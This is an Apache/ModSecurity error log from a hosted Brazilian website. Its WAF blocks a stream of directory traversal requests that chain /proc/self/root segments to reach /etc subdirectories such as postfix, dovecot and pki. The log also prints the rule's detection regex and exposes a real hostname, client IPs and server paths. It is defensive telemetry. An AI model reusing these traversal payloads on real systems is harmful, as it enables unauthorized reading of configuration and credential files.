"WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtqBCmAPhZkrhU8w4myAgAAAJI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 00:14:17.997862 2026] [:error] [pid 9333:tid 140411674785536] [client 74.7.241.31:38514] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtqCA_eYRmh974Uj6QLSgAAAog"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 00:14:18.002376 2026] [core:alert] [pid 9333:tid 140411649607424] [client 57.141.18.7:43460] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 00:14:18.002913 2026] [core:alert] [pid 15051:tid 140411725141760] [client 57.141.18.44:43372] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 00:14:21.429784 2026] [:error] [pid 9333:tid 140411574073088] [client 74.7.241.31:55414] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtqDQ_eYRmh974Uj6QLUgAAApQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 00:14:24.144719 2026] [:error] [pid 17887:tid 140411557287680] [client 74.7.241.31:55428] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtqDwkwaGbbGflqUZBbEQAAANY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 00:14:27.365979 2026] [:error] [pid 29882:tid 140411649607424] [client 74.7.244.43:59916] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abtqE0zinOy1jxa1j4dmSQAAAQs"]
[Thu Mar 19 00:14:29.129854 2026] [proxy_fcgi:error] [pid 23798:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:41936] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:14:30.199523 2026] [:error] [pid 29882:tid 140411674785536] [client 74.7.241.31:55436] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtqFkzinOy1jxa1j4dmSwAAAQg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 00:14:32.022166 2026] [:error] [pid 9333:tid 140411641214720] [client 74.7.241.31:48902] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtqGA_eYRmh974Uj6QLWAAAAow"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 00:14:36.203181 2026] [:error] [pid 17887:tid 140411574073088] [client 74.7.241.31:48904] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtqHAkwaGbbGflqUZBbFQAAANQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 00:14:41.631072 2026] [mime_magic:error] [pid 26799:tid 140411699963648] (70014)End of file found: [client 57.141.18.102:44086] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 00:14:51.129828 2026] [proxy_fcgi:error] [pid 15826:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:42428] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:15:11.718309 2026] [:error] [pid 27403:tid 140411548894976] [client 74.7.241.31:57768] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtqPxkFeYa1D6dYQnCUogAAAdc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 00:15:18.099456 2026] [proxy_fcgi:error] [pid 14269:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:42966] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:15:52.035043 2026] [proxy_fcgi:error] [pid 29882:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:43494] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:16:08.064664 2026] [mime_magic:error] [pid 15826:tid 140411741927168] (70014)End of file found: [client 57.141.18.55:46316] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 00:16:09.718640 2026] [mime_magic:error] [pid 14269:tid 140411599251200] (70014)End of file found: [client 57.141.18.32:46400] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 00:16:37.121950 2026] [proxy_fcgi:error] [pid 30077:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:44474] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:17:09.121820 2026] [proxy_fcgi:error] [pid 17887:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:45204] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:17:35.057915 2026] [proxy_fcgi:error] [pid 9333:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:45746] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:17:57.143579 2026] [proxy_fcgi:error] [pid 15051:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:46272] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:18:21.124883 2026] [proxy_fcgi:error] [pid 31803:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:46930] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:18:26.372859 2026] [:error] [pid 14269:tid 140411590858496] [client 74.7.243.128:37524] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtrAgbLMZ6AikZjR9UHdAAAABI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 00:18:33.328374 2026] [:error] [pid 27403:tid 140411557287680] [client 74.7.241.31:56256] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtrCRkFeYa1D6dYQnCVGAAAAdY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 00:18:37.256235 2026] [:error] [pid 27403:tid 140411590858496] [client 74.7.241.31:56256] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtrDRkFeYa1D6dYQnCVGQAAAdI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 00:18:40.540509 2026] [mime_magic:error] [pid 31803:tid 140411582465792] (70014)End of file found: [client 57.141.18.95:50040] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 00:18:42.125871 2026] [proxy_fcgi:error] [pid 27293:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:47432] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:18:43.476370 2026] [:error] [pid 27293:tid 140411590858496] [client 74.7.241.31:36034] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtrE_-YZRR_7pZ7nDI6IgAAA9I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 00:18:47.963362 2026] [:error] [pid 26799:tid 140411540502272] [client 74.7.241.31:37592] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtrF9a6ubjKNq_cu4bjQQAAA1g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 00:18:52.643885 2026] [core:alert] [pid 17887:tid 140411741927168] [client 57.141.18.44:50314] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 00:18:53.749379 2026] [:error] [pid 31803:tid 140411733534464] [client 74.7.241.31:37606] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtrHeyqAr6etmhZHNoQFAAAAEE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 00:18:56.047124 2026] [:error] [pid 17653:tid 140411666392832] [client 74.7.241.31:37608] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtrIMdf6f5d65gmYZQdHgAAAsk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 00:19:00.698199 2026] [:error] [pid 15051:tid 140411699963648] [client 74.7.241.31:53604] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtrIymAPhZkrhU8w4myZwAAAIU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 00:19:02.727300 2026] [:error] [pid 14269:tid 140411607643904] [client 74.7.241.31:53620] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtrJgbLMZ6AikZjR9UHjAAAABA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 00:19:04.033832 2026] [proxy_fcgi:error] [pid 15051:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:47990] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:19:06.459165 2026] [:error] [pid 14269:tid 140411557287680] [client 74.7.241.31:53634] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtrKgbLMZ6AikZjR9UHjgAAABY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 00:19:09.456387 2026] [:error] [pid 15051:tid 140411674785536] [client 74.7.241.31:49270] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtrLSmAPhZkrhU8w4mybAAAAIg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
